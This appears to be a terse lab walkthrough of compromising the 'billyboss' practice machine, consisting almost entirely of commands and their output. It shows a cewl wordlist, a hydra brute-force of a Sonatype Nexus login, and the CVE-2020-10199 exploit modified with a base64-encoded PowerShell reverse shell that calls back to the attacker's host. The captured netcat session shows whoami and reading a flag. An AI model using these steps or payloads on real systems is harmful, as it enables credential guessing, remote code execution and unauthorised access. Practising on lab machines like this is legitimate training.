Last updated
Last updated
Need credentials
$ cewl --lowercase 192.168.165.61:8081
CeWL 6.1 (Max Length) Robin Wood (robin@digi.ninja) (https://digi.ninja/)
nexus
repository
manager
loading
new
image
src
http
static
rapture
resources
favicon
ico
oss
product
logo
spinner
browse
history
form
$ cewl 192.168.165.61:8081
CeWL 6.1 (Max Length) Robin Wood (robin@digi.ninja) (https://digi.ninja/)
Nexus
Repository
Manager
Loading
new
Image
src
http
static
rapture
resources
favicon
ico
OSS
Product
Logo
Spinner
Browse
history
form
$ hydra -I -f -vV -L users.lower -P pass.lower 'http-post-form://192.168.165.61:8081/service/rapture/session:username=^USER64^&password=^PASS64^:F=/403'nexus:nexus$ searchsploit -m 49385
Exploit: Sonatype Nexus 3.21.1 - Remote Code Execution (Authenticated)
URL: https://www.exploit-db.com/exploits/49385
Path: /usr/share/exploitdb/exploits/java/webapps/49385.py
Codes: CVE-2020-10199
Verified: True
File Type: Unicode text, UTF-8 text
Copied to: /home/adot/oscp/pg/billyboss/49385.pyChanged the following
#!/usr/bin/python3
import sys
import base64
import requests
URL='http://192.168.165.61:8081'
CMD='powershell -e "JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQA5ADIALgAxADYAOAAuADQANQAuADIAMwAzACIALAAxADMAMwA3ACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA=="'
USERNAME='nexus'
PASSWORD='nexus'
$ nc -lnvp 1337
listening on [any] 1337 ...
connect to [192.168.45.233] from (UNKNOWN) [192.168.165.61] 50495
PS C:\Users\nathan\Nexus\nexus-3.21.0-05> whoami
billyboss\nathan
PS C:\Users\nathan\Nexus\nexus-3.21.0-05> type C:\Users\nathan\Desktop\local.txt
61c713a04f0379089cb7deed6307f442
PS C:\Users\nathan\Nexus\nexus-3.21.0-05> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 192.168.165.61
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.165.254
PS C:\Users\nathan\Nexus\nexus-3.21.0-05>
